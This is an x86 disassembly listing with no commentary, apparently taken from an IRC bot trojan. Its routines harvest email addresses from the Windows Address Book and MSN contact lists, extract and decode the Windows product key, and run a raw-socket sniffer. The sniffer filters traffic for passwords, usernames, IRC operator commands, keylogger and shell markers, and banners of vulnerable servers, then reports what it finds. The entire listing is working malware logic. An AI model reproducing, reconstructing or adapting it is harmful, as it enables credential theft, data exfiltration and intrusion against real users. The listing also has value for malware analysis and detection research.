var_290 = byte ptr -290h
var_24C = byte ptr -24Ch
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = byte ptr -0E0h
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 794h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_E4]
rep movsd
xor edi, edi
xor ebx, ebx
inc edi
loc_425240: ; DATA XREF: .text:off_44F904�o
mov [ebp+var_1C], 320h
mov [eax+0BCh], edi
mov eax, [ebp+var_E4]
mov [ebp+arg_0], eax
lea eax, [ebp+var_C]
push eax
push 0F003Fh
push ebx
push offset aSoftwareMicr_2 ; "Software\\Microsoft\\WAB\\WAB4\\Wab File Na"...
push 80000001h
call dword_437004 ; RegOpenKeyExA
cmp [ebp+var_C], ebx
jnz short loc_42527C
loc_425275: ; CODE XREF: sub_42521F+BD�j
; sub_42521F+E1�j
mov eax, edi
jmp loc_425482
; ---------------------------------------------------------------------------
loc_42527C: ; CODE XREF: sub_42521F+54�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_394]
push eax
push ebx
push ebx
push offset byte_454A54
push [ebp+var_C]
call dword_437028 ; RegQueryValueExA
push [ebp+var_C]
call dword_437000 ; RegCloseKey
push ebx
push 80h
push 4
push ebx
push edi
lea eax, [ebp+var_394]
push 80000000h
push eax
call dword_43705C ; CreateFileA
push ebx
push ebx
push ebx
push 2
push ebx
push eax
mov [ebp+var_4], eax
call dword_4370C8 ; CreateFileMappingA
cmp eax, ebx
mov [ebp+var_10], eax
jnz short loc_4252DE
push [ebp+var_4]
call dword_437044 ; CloseHandle
jmp short loc_425275
; ---------------------------------------------------------------------------
loc_4252DE: ; CODE XREF: sub_42521F+B2�j
push ebx
push ebx
push ebx
push 4
push eax
call dword_437040 ; MapViewOfFile
mov esi, eax
cmp esi, ebx
jnz short loc_425305
push [ebp+var_10]
mov esi, dword_437044
call esi ; dword_437044
push [ebp+var_4]
call esi ; dword_437044
jmp loc_425275
; ---------------------------------------------------------------------------
loc_425305: ; CODE XREF: sub_42521F+CF�j
xor ecx, ecx
xor eax, eax
mov ch, [esi+63h]
mov ah, [esi+61h]
mov cl, [esi+62h]
movsx edi, byte ptr [esi+64h]
movzx eax, ax
shl ecx, 10h
or ecx, eax
movzx eax, byte ptr [esi+60h]
or ecx, eax
mov eax, edi
imul eax, 44h
cmp eax, ebx
jle short loc_425392
add ecx, esi
push 44h
mov [ebp+var_8], ecx
dec eax
xor edx, edx
pop ecx
div ecx
mov edi, eax
inc edi
loc_42533D: ; CODE XREF: sub_42521F+171�j
mov ecx, [ebp+var_8]
xor eax, eax
loc_425342: ; CODE XREF: sub_42521F+132�j
mov dl, [ecx]
inc ecx
mov [ebp+eax+var_290], dl
inc ecx
inc eax
cmp eax, 44h
jle short loc_425342
cmp [ebp+var_2C], ebx
lea eax, [ebp+var_290]
push eax
lea eax, [ebp+var_E0]
push offset aS_5 ; "%s"
push eax
push [ebp+arg_0]
mov [ebp+var_24C], bl
jnz short loc_42537B
call sub_41CE4A
jmp short loc_425380
; ---------------------------------------------------------------------------
loc_42537B: ; CODE XREF: sub_42521F+153�j
call sub_41CDD4
loc_425380: ; CODE XREF: sub_42521F+15A�j
add esp, 10h
push 64h
call dword_437190 ; Sleep
add [ebp+var_8], 44h
dec edi
jnz short loc_42533D
loc_425392: ; CODE XREF: sub_42521F+10C�j
push [ebp+var_4]
mov edi, dword_437044
call edi ; dword_437044
push esi
call dword_437048 ; UnmapViewOfFile
push [ebp+var_10]
call edi ; dword_437044
lea eax, [ebp+var_18]
push eax
push 0F003Fh
push ebx
push offset aSoftwareMicr_3 ; "Software\\Microsoft\\MessengerService\\Lis"...
push 80000001h
call dword_437004 ; RegOpenKeyExA
test eax, eax
jnz loc_42547F
mov esi, 400h
mov [ebp+var_20], 3
mov [ebp+var_14], esi
mov [ebp+var_4], ebx
mov edi, offset dword_4504C4
loc_4253E2: ; CODE XREF: sub_42521F+252�j
push 80h
lea eax, [ebp+var_164]
push ebx
push eax
call sub_429760
push [ebp+var_4]
lea eax, [ebp+var_164]
push offset aAllowD ; "Allow%d"
push eax
call sub_429B03
inc [ebp+var_4]
push esi
lea eax, [ebp+var_794]
push ebx
push eax
mov [ebp+var_14], esi
call sub_429760
add esp, 24h
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_794]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_164]
push ebx
push eax
push [ebp+var_18]
call dword_437028 ; RegQueryValueExA
test eax, eax
jnz short loc_425476
cmp [ebp+var_2C], ebx
lea eax, [ebp+var_794]
push eax
lea eax, [ebp+var_E0]
push edi
push eax
push [ebp+arg_0]
jnz short loc_425461
call sub_41CE4A
jmp short loc_425466
; ---------------------------------------------------------------------------
loc_425461: ; CODE XREF: sub_42521F+239�j
call sub_41CDD4
loc_425466: ; CODE XREF: sub_42521F+240�j
add esp, 10h
push 64h
call dword_437190 ; Sleep
jmp loc_4253E2
; ---------------------------------------------------------------------------
loc_425476: ; CODE XREF: sub_42521F+222�j
push [ebp+var_18]
call dword_437000 ; RegCloseKey
loc_42547F: ; CODE XREF: sub_42521F+1A6�j
xor eax, eax
inc eax
loc_425482: ; CODE XREF: sub_42521F+58�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_42521F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425489 proc near ; CODE XREF: sub_425568+127�p
var_AC = byte ptr -0ACh
var_78 = byte ptr -78h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0ACh
lea eax, [ebp+var_4]
push esi
push eax
push 20019h
push 3
push offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push 80000002h
xor esi, esi
call dword_456FC0 ; RegOpenKeyExA
test eax, eax
jnz loc_425563
lea eax, [ebp+var_8]
mov [ebp+var_8], 0A4h
push eax
lea eax, [ebp+var_AC]
push eax
push esi
push esi
push offset aDigitalproduct ; "DigitalProductId"
push [ebp+var_4]
call dword_456DF0 ; RegQueryValueExA
test eax, eax
jnz short loc_42555A
push ebx
xor ebx, ebx
cmp [ebp+arg_4], esi
push edi
push 0Fh
lea esi, [ebp+var_78]
setnz bl
pop ecx
lea edi, [ebp+var_AC]
lea ebx, ds:18h[ebx*4]
add ebx, [ebp+arg_0]
mov [ebp+arg_0], 18h
rep movsb
loc_425507: ; CODE XREF: sub_425489+CA�j
push 0Eh
xor eax, eax
pop esi
loc_42550C: ; CODE XREF: sub_425489+A1�j
lea ecx, [ebp+esi+var_AC]
push 18h
shl eax, 8
movzx edx, byte ptr [ecx]
xor eax, edx
xor edx, edx
pop edi
div edi
dec esi
cmp esi, 0FFFFFFFFh
mov [ecx], al
mov eax, edx
jg short loc_42550C
mov al, byte_450544[eax]
push 5
mov [ebx], al
mov eax, [ebp+arg_0]
cdq
pop ecx
dec ebx
idiv ecx
test edx, edx
jnz short loc_425550
cmp [ebp+arg_0], edx
jle short loc_425550
cmp [ebp+arg_4], edx
jz short loc_425550
mov byte ptr [ebx], 2Dh
dec ebx
loc_425550: ; CODE XREF: sub_425489+B7�j
; sub_425489+BC�j ...
dec [ebp+arg_0]
jns short loc_425507
xor esi, esi
pop edi
inc esi
pop ebx
loc_42555A: ; CODE XREF: sub_425489+53�j
push [ebp+var_4]
call dword_456F08 ; RegCloseKey
loc_425563: ; CODE XREF: sub_425489+29�j
mov eax, esi
pop esi
leave
retn
sub_425489 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425568 proc near ; CODE XREF: sub_40A9FE+145D�p
var_BC = byte ptr -0BCh
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_8C = dword ptr -8Ch
var_88 = byte ptr -88h
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0BCh
push esi
push edi
xor edi, edi
push 10h
push edi
push offset dword_6607EC
mov esi, offset off_447718
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_9C]
mov [ebp+var_9C], 9Ch
push eax
call dword_437050 ; GetVersionExA
test eax, eax
jz loc_425686
push [ebp+var_94]
push [ebp+var_98]
push offset aD_D ; "%d.%d"
push 4
push esi
call sub_429BBE
add esp, 14h
cmp [ebp+var_98], 4
jnz short loc_42561B
cmp [ebp+var_94], edi
jnz short loc_4255FB
cmp [ebp+var_8C], 1
jnz short loc_4255E4
mov esi, offset a95 ; "95"
loc_4255E4: ; CODE XREF: sub_425568+75�j
cmp [ebp+var_8C], 2
jnz loc_425686
mov esi, offset aNt_0 ; "NT"
jmp loc_425686
; ---------------------------------------------------------------------------
loc_4255FB: ; CODE XREF: sub_425568+6C�j
cmp [ebp+var_94], 0Ah
jnz short loc_42560B
mov esi, offset a98 ; "98"
jmp short loc_425686
; ---------------------------------------------------------------------------
loc_42560B: ; CODE XREF: sub_425568+9A�j
cmp [ebp+var_94], 5Ah
jnz short loc_425686
mov esi, offset aMe_0 ; "ME"
jmp short loc_425686
; ---------------------------------------------------------------------------
loc_42561B: ; CODE XREF: sub_425568+64�j
cmp [ebp+var_98], 5
jnz short loc_425653
cmp [ebp+var_94], edi
jnz short loc_425633
mov esi, offset a2k ; "2K"
jmp short loc_425686
; ---------------------------------------------------------------------------
loc_425633: ; CODE XREF: sub_425568+C2�j
cmp [ebp+var_94], 1
jnz short loc_425643
mov esi, offset aXp ; "XP"
jmp short loc_425686
; ---------------------------------------------------------------------------
loc_425643: ; CODE XREF: sub_425568+D2�j
cmp [ebp+var_94], 2
jnz short loc_425686
mov esi, offset a2k3_0 ; "2K3"
jmp short loc_425686
; ---------------------------------------------------------------------------
loc_425653: ; CODE XREF: sub_425568+BA�j
cmp [ebp+var_98], 6
jnz short loc_425686
cmp [ebp+var_94], edi
jnz short loc_425678
cmp [ebp+var_2], 1
jnz short loc_425671
mov esi, offset aVista_0 ; "Vista"
jmp short loc_425686
; ---------------------------------------------------------------------------
loc_425671: ; CODE XREF: sub_425568+100�j
mov esi, offset a2008 ; "2008"
jmp short loc_425686
; ---------------------------------------------------------------------------
loc_425678: ; CODE XREF: sub_425568+FA�j
cmp [ebp+var_94], 1
jnz short loc_425686
mov esi, offset a7 ; "7"
loc_425686: ; CODE XREF: sub_425568+3B�j
; sub_425568+83�j ...
lea eax, [ebp+var_BC]
push 1
push eax
call sub_425489
pop ecx
test eax, eax
pop ecx
jz short loc_4256CF
lea eax, [ebp+var_BC]
cmp [ebp+arg_8], edi
push eax
lea eax, [ebp+var_88]
push eax
push esi
push offset aUhdhc1pcv9i ; "uhdhC1pCV9i/"
push offset aSWindowsSSKey_ ; "%s Windows %s (%s) Key: %.29s"
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_4256C8
call sub_41CE4A
loc_4256C3: ; CODE XREF: sub_425568+165�j
add esp, 1Ch
jmp short loc_4256F3
; ---------------------------------------------------------------------------
loc_4256C8: ; CODE XREF: sub_425568+154�j
call sub_41CDD4
jmp short loc_4256C3
; ---------------------------------------------------------------------------
loc_4256CF: ; CODE XREF: sub_425568+130�j
cmp [ebp+arg_8], edi
push offset aUhdhc1pcv9i ; "uhdhC1pCV9i/"
push offset aSWindowsKeyNot ; "%s Windows Key not found."
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_4256EB
call sub_41CE4A
jmp short loc_4256F0
; ---------------------------------------------------------------------------
loc_4256EB: ; CODE XREF: sub_425568+17A�j
call sub_41CDD4
loc_4256F0: ; CODE XREF: sub_425568+181�j
add esp, 10h
loc_4256F3: ; CODE XREF: sub_425568+15E�j
pop edi
pop esi
leave
retn
sub_425568 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4256F7 proc near ; CODE XREF: sub_40A9FE+1503�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 88h
lea eax, [ebp+var_4]
push esi
xor esi, esi
push eax
push 20019h
push esi
push [ebp+arg_10]
mov [ebp+var_4], esi
mov [ebp+var_8], 80h
push [ebp+arg_C]
call dword_437004 ; RegOpenKeyExA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_88]
push eax
push esi
push esi
push [ebp+arg_14]
push [ebp+var_4]
call dword_437028 ; RegQueryValueExA
test eax, eax
jnz short loc_425774
lea eax, [ebp+var_88]
cmp [ebp+arg_8], esi
push eax
push offset aUhdhc1pcv9i ; "uhdhC1pCV9i/"
push offset aSS_ ; "%s %s."
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_425763
call sub_41CE4A
jmp short loc_425768
; ---------------------------------------------------------------------------
loc_425763: ; CODE XREF: sub_4256F7+63�j
call sub_41CDD4
loc_425768: ; CODE XREF: sub_4256F7+6A�j
add esp, 14h
push [ebp+var_4]
call dword_437000 ; RegCloseKey
loc_425774: ; CODE XREF: sub_4256F7+47�j
pop esi
leave
retn
sub_4256F7 endp
; =============== S U B R O U T I N E =======================================
sub_425777 proc near ; CODE XREF: sub_425AE4+198�p
; sub_425AE4+1BC�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_6607FC, eax
mov eax, offset dword_6607FC
retn
sub_425777 endp
; =============== S U B R O U T I N E =======================================
sub_425786 proc near ; CODE XREF: sub_425AE4+226�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_443F24
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_4257A0
loc_42579C: ; CODE XREF: sub_425786+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4257A0: ; CODE XREF: sub_425786+14�j
push offset dword_443F14
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_42579C
push offset aSh ; "!* SH"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_4257C7
loc_4257C2: ; CODE XREF: sub_425786+50�j
; sub_425786+61�j ...
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_4257C7: ; CODE XREF: sub_425786+3A�j
push offset aUdp ; "!* UDP"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4257C2
push offset aPan ; "!* PAN"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4257C2
push offset aPush ; "!* PUSH"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4257C2
push offset aWget ; "wget"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4257C2
push offset aPhpshell ; "phpshell"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4257C2
push offset aMain_1 ; "[MAIN]:"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4257C2
push offset aScan ; "[SCAN]:"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4257C2
push offset aFtp_0 ; "[FTP]:"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz loc_4257C2
push offset aTftp_0 ; "[TFTP]:"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz loc_4257C2
push offset aKeylogger ; "[KEYLOGGER]:"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz loc_4257C2
push offset aVnc ; "[VNC]:"
push esi
call sub_42AEA0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_425786 endp
; =============== S U B R O U T I N E =======================================
sub_425892 proc near ; CODE XREF: sub_425AE4:loc_425D37�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aLtlec18us5q0 ; "LTLec18US5q0"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_4258AC
loc_4258A8: ; CODE XREF: sub_425892+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4258AC: ; CODE XREF: sub_425892+14�j
push offset dword_443F24
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258A8
push offset dword_443F14
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_4258D3
loc_4258CE: ; CODE XREF: sub_425892+50�j
; sub_425892+61�j ...
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_4258D3: ; CODE XREF: sub_425892+3A�j
push offset aPass_0 ; "PASS "
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258CE
push offset aIrcOperator ; "IRC Operator"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258CE
push offset aNowANetworkAdm ; "now a network administrator"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258CE
push offset aPrivmsg ; "PRIVMSG"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258CE
push offset aJoin ; "JOIN"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258CE
push offset aOper ; "OPER"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258CE
push offset aPong ; "PONG"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4258CE
push offset aPing ; "PING"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz loc_4258CE
push offset aUserhost ; "USERHOST"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz loc_4258CE
push offset aNotice ; "NOTICE"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz loc_4258CE
push offset aTopic_0 ; "TOPIC"
push esi
call sub_42AEA0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_425892 endp
; =============== S U B R O U T I N E =======================================
sub_42599E proc near ; CODE XREF: sub_425AE4:loc_425D61�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_443F24
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_4259B8
loc_4259B4: ; CODE XREF: sub_42599E+29�j
; sub_42599E+3A�j ...
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4259B8: ; CODE XREF: sub_42599E+14�j
push offset dword_443F14
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4259B4
push offset off_4506DC
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4259B4
push offset aMail ; "Mail"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4259B4
push offset aUser_1 ; "USER "
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_425A01
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_425A01: ; CODE XREF: sub_42599E+5C�j
push offset aPass_0 ; "PASS "
push esi
call sub_42AEA0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_42599E endp
; =============== S U B R O U T I N E =======================================
sub_425A16 proc near ; CODE XREF: sub_425AE4:loc_425D8B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_443F24
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_425A30
loc_425A2C: ; CODE XREF: sub_425A16+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_425A30: ; CODE XREF: sub_425A16+14�j
push offset dword_443F14
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_425A2C
push offset a_bot ; "_BOT"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_425A57
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_425A57: ; CODE XREF: sub_425A16+3A�j
push offset a_bot_login ; "_BOT_LOGIN"
push esi
call sub_42AEA0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_425A16 endp
; =============== S U B R O U T I N E =======================================
sub_425A6C proc near ; CODE XREF: sub_425AE4:loc_425DB5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_443F24
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_425A86
loc_425A82: ; CODE XREF: sub_425A6C+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_425A86: ; CODE XREF: sub_425A6C+14�j
push offset dword_443F14
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_425A82
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_425AAD
loc_425AA8: ; CODE XREF: sub_425A6C+50�j
; sub_425A6C+61�j
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_425AAD: ; CODE XREF: sub_425A6C+3A�j
push offset aApache1_3 ; "Apache/1.3"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_425AA8
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_425AA8
push offset aOpenssh_2 ; "OpenSSH_2"
push esi
call sub_42AEA0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
pop esi
retn
sub_425A6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425AE4 proc near ; DATA XREF: sub_40A9FE+FFC�o
var_4FC = byte ptr -4FCh
var_4FB = byte ptr -4FBh
var_3FC = byte ptr -3FCh
var_3F3 = byte ptr -3F3h
var_3F0 = dword ptr -3F0h
var_3EC = dword ptr -3ECh
var_3E8 = dword ptr -3E8h
var_3D4 = byte ptr -3D4h
var_1FC = byte ptr -1FCh
var_17C = byte ptr -17Ch
var_FC = dword ptr -0FCh
var_F8 = byte ptr -0F8h
var_78 = dword ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4FCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_FC]
rep movsd
xor esi, esi
push 3Fh
inc esi
xor ebx, ebx
mov [eax+0BCh], esi
mov eax, [ebp+var_FC]
mov [ebp+arg_0], eax
pop ecx
xor eax, eax
lea edi, [ebp+var_4FB]
mov [ebp+var_4FC], bl
push 0FFh
rep stosd
stosw
lea eax, [ebp+var_4FC]
mov [ebp+var_24], 2
push eax
mov [ebp+var_22], bx
mov [ebp+var_20], ebx
call dword_456F4C ; gethostname
lea eax, [ebp+var_4FC]
push eax
call dword_456FD4 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_10]
push eax
call sub_429420
mov eax, [ebp+var_10]
add esp, 0Ch
mov [ebp+var_20], eax
push ebx
push 3
push 2
call dword_456FD0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jnz short loc_425B96
push [ebp+var_78]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
loc_425B96: ; CODE XREF: sub_425AE4+A0�j
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_456F6C ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_425BBF
push edi
call dword_456FF0 ; closesocket
push [ebp+var_78]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
loc_425BBF: ; CODE XREF: sub_425AE4+C2�j
push ebx
lea eax, [ebp+var_28]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_14]
push 4
push eax
push 98000001h
push edi
mov [ebp+var_14], esi
call dword_456EC0 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_425BF8
push edi
call dword_456FF0 ; closesocket
push [ebp+var_78]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
loc_425BF8: ; CODE XREF: sub_425AE4+FB�j
mov ecx, [ebp+arg_0]
call sub_41DB58
push eax
lea eax, [ebp+var_38]
push eax
call dword_4370B4 ; lstrcpyA
mov ecx, [ebp+arg_0]
call sub_41DB60
test al, al
jz loc_425DFF
mov esi, offset aS_5 ; "%s"
loc_425C20: ; CODE XREF: sub_425AE4+315�j
mov edi, 200h
lea eax, [ebp+var_3FC]
push edi
push ebx
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_3FC]
push ebx
push edi
push eax
push [ebp+var_C]
call dword_456F58 ; recv
cmp [ebp+var_3F3], 6
jnz loc_425DEF
push [ebp+var_3E8]
call dword_456E30 ; ntohs
push [ebp+var_3E8+2]
movzx edi, ax
call dword_456E30 ; ntohs
push [ebp+var_3F0]
movzx eax, ax
mov [ebp+var_4], eax
call sub_425777
add esp, 4
push dword ptr [eax]
call dword_456FDC ; inet_ntoa
push eax
lea eax, [ebp+var_17C]
push esi
push eax
call sub_429B03
push [ebp+var_3EC]
call sub_425777
add esp, 10h
push dword ptr [eax]
call dword_456FDC ; inet_ntoa
push eax
lea eax, [ebp+var_1FC]
push esi
push eax
call sub_429B03
lea eax, [ebp+var_3D4]
mov [ebp+var_8], ebx
push eax
call sub_4293A0
add esp, 10h
test eax, eax
jbe short loc_425D03
loc_425CD4: ; CODE XREF: sub_425AE4+21D�j
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_3D4]
cmp byte ptr [eax], 0Dh
jnz short loc_425CE6
mov byte ptr [eax], 20h
loc_425CE6: ; CODE XREF: sub_425AE4+1FD�j
cmp byte ptr [eax], 0Ah
jnz short loc_425CEE
mov byte ptr [eax], 20h
loc_425CEE: ; CODE XREF: sub_425AE4+205�j
inc [ebp+var_8]
lea eax, [ebp+var_3D4]
push eax
call sub_4293A0
cmp [ebp+var_8], eax
pop ecx
jb short loc_425CD4
loc_425D03: ; CODE XREF: sub_425AE4+1EE�j
lea eax, [ebp+var_3D4]
push eax
call sub_425786
test eax, eax
pop ecx
lea eax, [ebp+var_3D4]
push eax
jz short loc_425D37
push [ebp+var_4]
lea eax, [ebp+var_1FC]
push eax
lea eax, [ebp+var_17C]
push edi
push eax
push offset unk_4507C0
jmp loc_425DDD
; ---------------------------------------------------------------------------
loc_425D37: ; CODE XREF: sub_425AE4+235�j
call sub_425892
test eax, eax
pop ecx
lea eax, [ebp+var_3D4]
push eax
jz short loc_425D61
push [ebp+var_4]
lea eax, [ebp+var_1FC]
push eax
lea eax, [ebp+var_17C]
push edi
push eax
push offset unk_45079C
jmp short loc_425DDD
; ---------------------------------------------------------------------------
loc_425D61: ; CODE XREF: sub_425AE4+262�j
call sub_42599E
test eax, eax
pop ecx
lea eax, [ebp+var_3D4]
push eax
jz short loc_425D8B
push [ebp+var_4]
lea eax, [ebp+var_1FC]
push eax
lea eax, [ebp+var_17C]
push edi
push eax
push offset unk_450778
jmp short loc_425DDD
; ---------------------------------------------------------------------------
loc_425D8B: ; CODE XREF: sub_425AE4+28C�j
call sub_425A16
test eax, eax
pop ecx
lea eax, [ebp+var_3D4]
push eax
jz short loc_425DB5
push [ebp+var_4]
lea eax, [ebp+var_1FC]
push eax
lea eax, [ebp+var_17C]
push edi
push eax
push offset unk_450754
jmp short loc_425DDD
; ---------------------------------------------------------------------------
loc_425DB5: ; CODE XREF: sub_425AE4+2B6�j
call sub_425A6C
test eax, eax
pop ecx
jz short loc_425DEF
lea eax, [ebp+var_3D4]
push eax
lea eax, [ebp+var_1FC]
push [ebp+var_4]
push eax
lea eax, [ebp+var_17C]
push edi
push eax
push offset dword_450730
loc_425DDD: ; CODE XREF: sub_425AE4+24E�j
; sub_425AE4+27B�j ...
lea eax, [ebp+var_F8]
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 20h
loc_425DEF: ; CODE XREF: sub_425AE4+16B�j
; sub_425AE4+2D9�j
mov ecx, [ebp+arg_0]
call sub_41DB60
test al, al
jnz loc_425C20
loc_425DFF: ; CODE XREF: sub_425AE4+131�j
push [ebp+var_C]
call dword_456FF0 ; closesocket
push [ebp+var_78]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
sub_425AE4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425E18 proc near ; CODE XREF: sub_425FFA+168�p
; sub_425FFA+182�p ...
var_38 = dword ptr -38h
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_4293A0
cmp eax, 9Fh
pop ecx
ja loc_425FF6
push 10h
lea eax, [ebp+var_28]
push 0
push eax
